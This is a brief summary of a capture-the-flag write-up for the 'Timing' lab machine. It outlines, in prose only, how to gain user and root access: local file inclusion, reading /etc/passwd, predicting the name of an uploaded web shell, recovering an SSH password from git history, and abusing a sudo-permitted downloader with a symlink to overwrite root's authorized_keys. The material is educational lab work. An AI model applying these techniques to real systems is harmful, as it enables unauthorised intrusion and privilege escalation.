Timing writeup by evyatar9

Read my writeup for Timing mahine on:


User: Found LFI on image.php file, Reading the content of the php files, Found aaron user on /etc/passwd, Using aaron:aaron credentials we can log in to the web portal, From profile_update.php file we can see we can change our role to get permission to upload files, Calculated the file name from upload.php file (We can calculate the “random” file name because the developer writes md5('$file_hash' ...) instead of md5($file_hash ...) on upload.php) Using that we are uploading a web shell, Found backup file on /opt/source-files-backup.zip, By extracting the backup we found .git directory, revert to a specific commit and we found the SSH password of aaron user on db_conn.php file.

Root: By running sudo -l we found we can run /usr/bin/netutils (Which run a jar on root directory) as root, Using this jar we can download files to the target machine (HTTP/FTP) and write the files with root permission, Create symlink to /root/.ssh/authorized_keys on aaron home directory and download file with the same name from our host, this file contains our SSH public key, At the moment the file was download from our host we can log in as root using our SSH private key.